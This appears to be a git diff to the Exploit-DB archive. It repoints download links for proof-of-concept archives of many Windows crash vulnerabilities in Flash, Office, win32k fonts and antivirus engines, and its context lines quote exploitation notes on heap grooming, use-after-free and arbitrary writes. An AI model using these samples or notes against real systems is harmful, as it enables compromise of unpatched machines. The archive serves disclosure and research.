No newline at end of file diff --git a/exploits/windows/dos/37854.txt b/exploits/windows/dos/37854.txt index e73d45ce3..ccccd209f 100644 --- a/exploits/windows/dos/37854.txt +++ b/exploits/windows/dos/37854.txt @@ -58,4 +58,4 @@ newmc.scrollRect = o --- Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37854.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37854.zip \ No newline at end of file diff --git a/exploits/windows/dos/37856.txt b/exploits/windows/dos/37856.txt index fb1ca5b4a..8447fb8a6 100644 --- a/exploits/windows/dos/37856.txt +++ b/exploits/windows/dos/37856.txt @@ -47,4 +47,4 @@ Notes: - Attached samples: signal_sigsegv_7ffff6d2184d_5692_9217909125eb9174614e1368d5f07173 (crashing file), 9217909125eb9174614e1368d5f07173 (original file). The total difference between the two files is 13 bytes. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37856.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37856.zip \ No newline at end of file diff --git a/exploits/windows/dos/37857.txt b/exploits/windows/dos/37857.txt index 17cf4a14d..3b7d7aca9 100644 --- a/exploits/windows/dos/37857.txt +++ b/exploits/windows/dos/37857.txt @@ -45,4 +45,4 @@ Notes: - Attached samples: signal_sigsegv_7ffff6d8a235_3103_51dea5ced16249520f1fa0a7a63d7b36 (crashing file), 51dea5ced16249520f1fa0a7a63d7b36 (original file). The total difference between the two files is 19 bytes. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37857.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37857.zip \ No newline at end of file diff --git a/exploits/windows/dos/37858.txt b/exploits/windows/dos/37858.txt index 4f7133cc6..cb9683b67 100644 --- a/exploits/windows/dos/37858.txt +++ b/exploits/windows/dos/37858.txt @@ -58,4 +58,4 @@ Notes: - Attached samples: signal_sigsegv_7ffff710e9d3_881_11431348555663755408.ttf.swf (crashing file), 11431348555663755408.ttf.swf (original file). Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37858.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37858.zip \ No newline at end of file diff --git a/exploits/windows/dos/37860.txt b/exploits/windows/dos/37860.txt index 894e01a0d..3442509bb 100644 --- a/exploits/windows/dos/37860.txt +++ b/exploits/windows/dos/37860.txt @@ -47,4 +47,4 @@ c.setRGB(o) --- Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37860.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37860.zip \ No newline at end of file diff --git a/exploits/windows/dos/37861.txt b/exploits/windows/dos/37861.txt index 49e5739e0..37bc06d3a 100644 --- a/exploits/windows/dos/37861.txt +++ b/exploits/windows/dos/37861.txt @@ -70,4 +70,4 @@ And we're done :) --- Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37861.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37861.zip \ No newline at end of file diff --git a/exploits/windows/dos/37862.txt b/exploits/windows/dos/37862.txt index af27583d7..f26bacc21 100644 --- a/exploits/windows/dos/37862.txt +++ b/exploits/windows/dos/37862.txt @@ -59,4 +59,4 @@ WARNING: Stack unwind information not available. Following frames may be wrong. For 2), there's a .tar file with a repro SWF in it (may not reproduce outside of analysis tools because it is an OOB read). Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37862.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37862.zip \ No newline at end of file diff --git a/exploits/windows/dos/37875.txt b/exploits/windows/dos/37875.txt index 6e73b1add..41eef707f 100644 --- a/exploits/windows/dos/37875.txt +++ b/exploits/windows/dos/37875.txt @@ -22,4 +22,4 @@ Flash32_17_0_0_188+0x18cb: - The following test cases are attached: 2038518113_crash.swf (crashing file), 2038518113_min.swf (minimized file), 2038518113_orig.swf (original non-crashing file). Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37875.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37875.zip \ No newline at end of file diff --git a/exploits/windows/dos/37883.txt b/exploits/windows/dos/37883.txt index 9df13b11a..cb054b567 100644 --- a/exploits/windows/dos/37883.txt +++ b/exploits/windows/dos/37883.txt @@ -127,4 +127,4 @@ var a = tfield.filters --- Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37883.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37883.zip \ No newline at end of file diff --git a/exploits/windows/dos/37884.txt b/exploits/windows/dos/37884.txt index 58e38a4e0..c52094996 100644 --- a/exploits/windows/dos/37884.txt +++ b/exploits/windows/dos/37884.txt @@ -111,4 +111,4 @@ tfield.filters = o; Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37884.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37884.zip \ No newline at end of file diff --git a/exploits/windows/dos/37909.txt b/exploits/windows/dos/37909.txt index 4b9a75267..b4405e1b5 100644 --- a/exploits/windows/dos/37909.txt +++ b/exploits/windows/dos/37909.txt @@ -92,4 +92,4 @@ Examining memory at [ebp-8] we see: An attacker may control the uninitialized value by first allocating a heap chunk of the same size such that it will land in the same spot as the above chunk. The attacker can write data to the +4ch offset and then free the chunk back to the system. The attacker will then have control over the pointer in eax+4ch when it is used during . If this points to a valid page it will survive the dereferences in the crashing path. It did not look as though there was an immediately path to cause an out of bounds memory write. However, it is likely that this attacker controlled pointer will need to be free-ed later in execution. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37909.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37909.zip \ No newline at end of file diff --git a/exploits/windows/dos/37910.txt b/exploits/windows/dos/37910.txt index 1f204f70e..973d53618 100644 --- a/exploits/windows/dos/37910.txt +++ b/exploits/windows/dos/37910.txt @@ -84,4 +84,4 @@ wwlib!FMain+0x66d93: At attacker may control these values by grooming memory so that he or she controls the memory after the a8 sized chunk. This can lead to memory corruption and arbitrary code execution. The root cause of this bug suggestive of a type confusion vulnerability earlier in the call stack but this has not been determined with certainty. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37910.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37910.zip \ No newline at end of file diff --git a/exploits/windows/dos/37911.txt b/exploits/windows/dos/37911.txt index c49ca54cd..d3b0486ff 100644 --- a/exploits/windows/dos/37911.txt +++ b/exploits/windows/dos/37911.txt @@ -65,4 +65,4 @@ bp 3bdb946d ".if (@esi & 0x`ffffffff) = 0x`80008100 {} .else{gc}" This crash is writing to a memory address out-of-bound to the allocated buffer, therefore this is an exploitable vulnerability. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37911.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37911.zip \ No newline at end of file diff --git a/exploits/windows/dos/37912.txt b/exploits/windows/dos/37912.txt index 8a38d0997..6303e7970 100644 --- a/exploits/windows/dos/37912.txt +++ b/exploits/windows/dos/37912.txt @@ -67,4 +67,4 @@ WARNING: Stack unwind information not available. Following frames may be wrong. To exploit this bug an attacker must spray memory until virtual address 0x00019000 is reserved and committed into the running process. Then, at offset 0x910 in that page the attacker must place any address he or she wishes to free. This will lead to an exploitable arbitrary free vulnerability. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37912.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37912.zip \ No newline at end of file diff --git a/exploits/windows/dos/37913.txt b/exploits/windows/dos/37913.txt index 2c06b59be..f76e9b50b 100644 --- a/exploits/windows/dos/37913.txt +++ b/exploits/windows/dos/37913.txt @@ -63,4 +63,4 @@ In this crash the value being dereferenced in edi is free-ed memory: There is a 1-bit clear at the location specified by edi shortly after the faulting eip location as well making this an exploitable condition. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37913.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37913.zip \ No newline at end of file diff --git a/exploits/windows/dos/37914.txt b/exploits/windows/dos/37914.txt index fce25ce58..c7c7b4d6a 100644 --- a/exploits/windows/dos/37914.txt +++ b/exploits/windows/dos/37914.txt @@ -73,4 +73,4 @@ In order to reproduce the problem with the provided sample, it might be necessar Attached is a proof of concept font file together with the corresponding kernel crash log. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37914.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37914.zip \ No newline at end of file diff --git a/exploits/windows/dos/37915.txt b/exploits/windows/dos/37915.txt index 795895157..1ca7bf703 100644 --- a/exploits/windows/dos/37915.txt +++ b/exploits/windows/dos/37915.txt @@ -66,4 +66,4 @@ The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Speci Attached is a proof of concept font file together with the corresponding kernel crash log. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37915.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37915.zip \ No newline at end of file diff --git a/exploits/windows/dos/37916.txt b/exploits/windows/dos/37916.txt index 192003706..2a1e0cf74 100644 --- a/exploits/windows/dos/37916.txt +++ b/exploits/windows/dos/37916.txt @@ -65,4 +65,4 @@ The issue reproduces on reliably Windows 7 and 8.1. It is easiest to reproduce a Attached is an archive with two proof of concept font files together with corresponding kernel crash logs. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37916.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37916.zip \ No newline at end of file diff --git a/exploits/windows/dos/37917.txt b/exploits/windows/dos/37917.txt index 97ff165e5..e6ebb3636 100644 --- a/exploits/windows/dos/37917.txt +++ b/exploits/windows/dos/37917.txt @@ -65,4 +65,4 @@ The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Speci Attached is an archive with three proof of concept font files together with corresponding kernel crash logs. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37917.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37917.zip \ No newline at end of file diff --git a/exploits/windows/dos/37918.txt b/exploits/windows/dos/37918.txt index d9e757aa3..683811741 100644 --- a/exploits/windows/dos/37918.txt +++ b/exploits/windows/dos/37918.txt @@ -130,4 +130,4 @@ I am attaching another archive with further 3 samples triggering crashes at inva Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37918.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37918.zip \ No newline at end of file diff --git a/exploits/windows/dos/37919.txt b/exploits/windows/dos/37919.txt index 3fd3f191d..d98044123 100644 --- a/exploits/windows/dos/37919.txt +++ b/exploits/windows/dos/37919.txt @@ -87,4 +87,4 @@ The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Speci Attached is an archive with eight sample files, each crashing at a different location in the win32k!itrp_IUP function on Windows 7 32-bit, together with corresponding kernel crash logs. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37919.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37919.zip \ No newline at end of file diff --git a/exploits/windows/dos/37920.txt b/exploits/windows/dos/37920.txt index 581a3b9c0..5b8f8b3d4 100644 --- a/exploits/windows/dos/37920.txt +++ b/exploits/windows/dos/37920.txt @@ -108,4 +108,4 @@ The issue reproduces on Windows 7. It is easiest to reproduce with Special Pools Attached is an archive with two proof of concept font files together with corresponding kernel crash logs. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37920.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37920.zip \ No newline at end of file diff --git a/exploits/windows/dos/37921.txt b/exploits/windows/dos/37921.txt index 0d5ea11c0..0bc19ff2d 100644 --- a/exploits/windows/dos/37921.txt +++ b/exploits/windows/dos/37921.txt @@ -116,4 +116,4 @@ Note that this crash is very similar in its nature to Issue 383 (invalid memor Attached is an archive with six proof of concept font files (three for each crash location) together with corresponding kernel crash logs. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37921.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37921.zip \ No newline at end of file diff --git a/exploits/windows/dos/37922.txt b/exploits/windows/dos/37922.txt index d02b1bb46..0aaac632b 100644 --- a/exploits/windows/dos/37922.txt +++ b/exploits/windows/dos/37922.txt @@ -160,4 +160,4 @@ WARNING: Stack unwind information not available. Following frames may be wrong. Attached are further three samples together with corresponding crash log files, which reproduce the issue at the ATMFD+0x3407b location. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37922.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37922.zip \ No newline at end of file diff --git a/exploits/windows/dos/37923.txt b/exploits/windows/dos/37923.txt index b5f3c2b34..e4f8c6226 100644 --- a/exploits/windows/dos/37923.txt +++ b/exploits/windows/dos/37923.txt @@ -87,4 +87,4 @@ The issue reproduces on Windows 7. It is easiest to reproduce with Special Pools Attached is an archive with two proof of concept font files together with corresponding kernel crash logs. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37923.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37923.zip \ No newline at end of file diff --git a/exploits/windows/dos/37924.txt b/exploits/windows/dos/37924.txt index bf7990f7b..50f326aa5 100644 --- a/exploits/windows/dos/37924.txt +++ b/exploits/windows/dos/37924.txt @@ -54,4 +54,4 @@ WARNING: Stack unwind information not available. Following frames may be wrong. We can see that esi has an application verifier heap chunk canary value used at the start of allocated chuncks. Clearly we've indexed somewhere we shouldn't be. In this case we can see that esi came from [ecx+18h] and ecx was moved backwards in memory due to the negative value in edi. These pointers are used later on in the vulnerable function to write data leading to memory corruption. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37924.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37924.zip \ No newline at end of file diff --git a/exploits/windows/dos/37966.txt b/exploits/windows/dos/37966.txt index 038603007..acba76b1d 100644 --- a/exploits/windows/dos/37966.txt +++ b/exploits/windows/dos/37966.txt @@ -64,4 +64,4 @@ the crashing register value (0xAAAAAAAA) is also attached (037542f7_full.doc) Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37966.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37966.zip \ No newline at end of file diff --git a/exploits/windows/dos/37967.txt b/exploits/windows/dos/37967.txt index 887c1772c..71bd3ee76 100644 --- a/exploits/windows/dos/37967.txt +++ b/exploits/windows/dos/37967.txt @@ -61,4 +61,4 @@ file). 86ea4a3c_orig.doc (original file) Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37967.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37967.zip \ No newline at end of file diff --git a/exploits/windows/dos/38214.txt b/exploits/windows/dos/38214.txt index 69db3eabb..6612b644e 100644 --- a/exploits/windows/dos/38214.txt +++ b/exploits/windows/dos/38214.txt @@ -52,4 +52,4 @@ In this crash esi is a heap address. We can see that this is a free chunk: This is a use after free vulnerability affecting all currently supported versions of Microsoft Excel. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38214.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38214.zip \ No newline at end of file diff --git a/exploits/windows/dos/38215.txt b/exploits/windows/dos/38215.txt index 5ef94593f..77d1a4ff4 100644 --- a/exploits/windows/dos/38215.txt +++ b/exploits/windows/dos/38215.txt @@ -72,4 +72,4 @@ We can see that esi is holding a pointer to invalid memory. This is a heap addre Esi is a free-ed allocation. This is a use after free vulnerability. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38215.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38215.zip \ No newline at end of file diff --git a/exploits/windows/dos/38216.txt b/exploits/windows/dos/38216.txt index 8eb37de42..f8c660c55 100644 --- a/exploits/windows/dos/38216.txt +++ b/exploits/windows/dos/38216.txt @@ -76,4 +76,4 @@ We can see here that eax is being indexed at an offset of 0x3f0. However, if we This poc behaves like a type confusion or memory corruption issue in areas not protected by application verifier. The fact the eip was corrupted indicates a high likelihood for exploitation. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38216.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38216.zip \ No newline at end of file diff --git a/exploits/windows/dos/38217.txt b/exploits/windows/dos/38217.txt index 09ea145ff..5373029b6 100644 --- a/exploits/windows/dos/38217.txt +++ b/exploits/windows/dos/38217.txt @@ -76,4 +76,4 @@ With this PoC edi=0x0000666e and edx=0x00013350. The edx value is calculated ear There is a distinct lack of overflow checks and bounds checking in the OGL!ValidateBitmapInfo function that may lead to memory corruption when doing bitmap conversion later on in the code. For example, if the 0x13350 value is able to grow to 0x27fd0 we can set the edi value to be 0xffffcb60 (0x666e * 0x27fd0 = 0xffffcb60) which leads to an out of bound write instead of an out of bound read later in the code. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38217.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38217.zip \ No newline at end of file diff --git a/exploits/windows/dos/38272.txt b/exploits/windows/dos/38272.txt index a7b045860..eb0af115a 100644 --- a/exploits/windows/dos/38272.txt +++ b/exploits/windows/dos/38272.txt @@ -3,4 +3,4 @@ Source: https://code.google.com/p/google-security-research/issues/detail?id=304 Creating a device context with the flag (DCX_NORESETATTRS) and selecting a brush object into the device context will result in the brush being freed on process exit without the reference to the object being cleared. The PoC consists of two files (prime304.cpp and poc304.cpp). poc304 will execute prime304, which triggers the issue and allows poc304 to retrieve a handle to the device context with the pointer to the freed object. We can confirm this by requesting the handle for the brush object from the device context, resulting in reading freed memory. In some cases the issue leads to memory corruption when for example another object is allocated into the space of the free brush object (see attached crash logs for examples). Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38272.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38272.zip \ No newline at end of file diff --git a/exploits/windows/dos/38281.txt b/exploits/windows/dos/38281.txt index 91c71b26f..3113c659e 100644 --- a/exploits/windows/dos/38281.txt +++ b/exploits/windows/dos/38281.txt @@ -67,4 +67,4 @@ That is from the input file: 0001e60: 8933 0800 2b2f 4f5a 0040 1909 6edf cf11 .3..+/OZ.@..n... Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38281.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38281.zip \ No newline at end of file diff --git a/exploits/windows/dos/38282.txt b/exploits/windows/dos/38282.txt index a30e7de85..767ab8b3c 100644 --- a/exploits/windows/dos/38282.txt +++ b/exploits/windows/dos/38282.txt @@ -69,4 +69,4 @@ do { That's a bug, because if index < SIZEOF_JMP, it will wrap and never exit. I would think it should decrement by 1 not sizeof(jmp) anyway, because jmps do not have to be aligned, but I don't know anything about ExeCryptor - maybe it makes sense. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38282.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38282.zip \ No newline at end of file diff --git a/exploits/windows/dos/38283.txt b/exploits/windows/dos/38283.txt index 5da4b47b7..a56a774a3 100644 --- a/exploits/windows/dos/38283.txt +++ b/exploits/windows/dos/38283.txt @@ -50,4 +50,4 @@ Evaluate expression: -2147483646 Which is less than 0x3f1, the size parameter. Those values are directly from the executable being scanned. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38283.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38283.zip \ No newline at end of file diff --git a/exploits/windows/dos/38284.txt b/exploits/windows/dos/38284.txt index 8dca352f6..8e8cf5e0c 100644 --- a/exploits/windows/dos/38284.txt +++ b/exploits/windows/dos/38284.txt @@ -39,4 +39,4 @@ cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38284.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38284.zip \ No newline at end of file diff --git a/exploits/windows/dos/38285.txt b/exploits/windows/dos/38285.txt index ed6a47f03..e1b0cf105 100644 --- a/exploits/windows/dos/38285.txt +++ b/exploits/windows/dos/38285.txt @@ -57,4 +57,4 @@ The input pointer is corrupt because the loop overwrites the src pointer with at It seems likely /GS would have made this unexploitable. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38285.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38285.zip \ No newline at end of file diff --git a/exploits/windows/dos/38286.txt b/exploits/windows/dos/38286.txt index 83eca4dc7..cd3315e5f 100644 --- a/exploits/windows/dos/38286.txt +++ b/exploits/windows/dos/38286.txt @@ -29,4 +29,4 @@ D8 01 00 80 38 00 00 80 EE 01 00 80 78 00 00 80 The bug is that the index is not verified, resulting in an arbitrary write. This is obviously exploitable for arbitrary code execution. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38286.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38286.zip \ No newline at end of file diff --git a/exploits/windows/dos/38288.txt b/exploits/windows/dos/38288.txt index 20eb82738..b52e5e067 100644 --- a/exploits/windows/dos/38288.txt +++ b/exploits/windows/dos/38288.txt @@ -44,4 +44,4 @@ B0 4D 5B 5C A8 19 09 FE 36 1A B6 92 3A 92 96 78 Directly from the input file, so this is obviously exploitable for remote code execution as NT AUTHORITY\SYSTEM. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38288.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38288.zip \ No newline at end of file diff --git a/exploits/windows/dos/38344.txt b/exploits/windows/dos/38344.txt index 22664f412..55e6303b1 100644 --- a/exploits/windows/dos/38344.txt +++ b/exploits/windows/dos/38344.txt @@ -36,4 +36,4 @@ Initiative. Code: https://github.com/reigningshells/CVE-2015-3073/blob/master/exploit.js -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38344.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38344.zip \ No newline at end of file diff --git a/exploits/windows/dos/38348.txt b/exploits/windows/dos/38348.txt index 5a9a671f8..7ef724f17 100644 --- a/exploits/windows/dos/38348.txt +++ b/exploits/windows/dos/38348.txt @@ -27,4 +27,4 @@ I’ve provided a simple example which allocates a 16k UInt vector. Using a debu The source is a HAXE file, you need to compile with the command line “haxe -main Test -swf output.swf -swf-version 10” Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38348.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38348.zip \ No newline at end of file diff --git a/exploits/windows/dos/38485.py b/exploits/windows/dos/38485.py index 817aa32ee..f4aa29469 100755 --- a/exploits/windows/dos/38485.py +++ b/exploits/windows/dos/38485.py @@ -5,7 +5,7 @@ # Version: 2.2.1 # Tested on: Windows 7 Professional 64 bits # -# PoC with MP3: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38485.zip +# PoC with MP3: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38485.zip # #APP: vlc.exe diff --git a/exploits/windows/dos/38580.txt b/exploits/windows/dos/38580.txt index 8685da5bf..bb8ad36f4 100644 --- a/exploits/windows/dos/38580.txt +++ b/exploits/windows/dos/38580.txt @@ -44,4 +44,4 @@ Observed Result: The reference cycle is created and the user can reopen the process. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38580.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38580.zip \ No newline at end of file diff --git a/exploits/windows/dos/38701.txt b/exploits/windows/dos/38701.txt index 9cea10930..1f9c20c65 100644 --- a/exploits/windows/dos/38701.txt +++ b/exploits/windows/dos/38701.txt @@ -47,4 +47,4 @@ PoC: - http://zeroscience.mk/codes/sg2fbd-5276.zip -- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38701.zip \ No newline at end of file +- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38701.zip \ No newline at end of file diff --git a/exploits/windows/dos/38702.txt b/exploits/windows/dos/38702.txt index 41b0ff4b2..8de00d1c3 100644 --- a/exploits/windows/dos/38702.txt +++ b/exploits/windows/dos/38702.txt @@ -44,4 +44,4 @@ PoC: - http://zeroscience.mk/codes/tp3tpc-5277.zip -- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38702.zip \ No newline at end of file +- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38702.zip \ No newline at end of file diff --git a/exploits/windows/dos/38703.txt b/exploits/windows/dos/38703.txt index c85ef80ab..4e947c9b1 100644 --- a/exploits/windows/dos/38703.txt +++ b/exploits/windows/dos/38703.txt @@ -45,4 +45,4 @@ PoC: - http://zeroscience.mk/codes/aptpc-5278.zip -- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38703.zip \ No newline at end of file +- https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38703.zip \ No newline at end of file diff --git a/exploits/windows/dos/38713.txt b/exploits/windows/dos/38713.txt index 8beb51715..3ead1bf54 100644 --- a/exploits/windows/dos/38713.txt +++ b/exploits/windows/dos/38713.txt @@ -84,4 +84,4 @@ The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Speci Attached is an archive with several proof-of-concept TTF files, together with corresponding kernel crash logs from Windows 7 64-bit. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38713.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38713.zip \ No newline at end of file diff --git a/exploits/windows/dos/38714.txt b/exploits/windows/dos/38714.txt index e5d1c1bf7..ffbabaee8 100644 --- a/exploits/windows/dos/38714.txt +++ b/exploits/windows/dos/38714.txt @@ -81,4 +81,4 @@ The issue reproduces on Windows 7 (32 and 64-bit). It is easiest to reproduce wi Attached is an archive with the proof-of-concept mutated TTF file, together with the original font used to generate it and a corresponding kernel crash log from Windows 7 64-bit. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38714.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38714.zip \ No newline at end of file diff --git a/exploits/windows/dos/38735.txt b/exploits/windows/dos/38735.txt index 84e6b12e6..8abd2ff21 100644 --- a/exploits/windows/dos/38735.txt +++ b/exploits/windows/dos/38735.txt @@ -35,4 +35,4 @@ avengine_dll!ekaGetObjectFactory+0x51537: This vulnerability is exploitable for remote code execution as NT AUTHORITY\SYSTEM. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38735.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38735.zip \ No newline at end of file diff --git a/exploits/windows/dos/38736.txt b/exploits/windows/dos/38736.txt index 85e542d03..8247bb833 100644 --- a/exploits/windows/dos/38736.txt +++ b/exploits/windows/dos/38736.txt @@ -99,4 +99,4 @@ Entry User Heap Segment Size PrevSize Unused 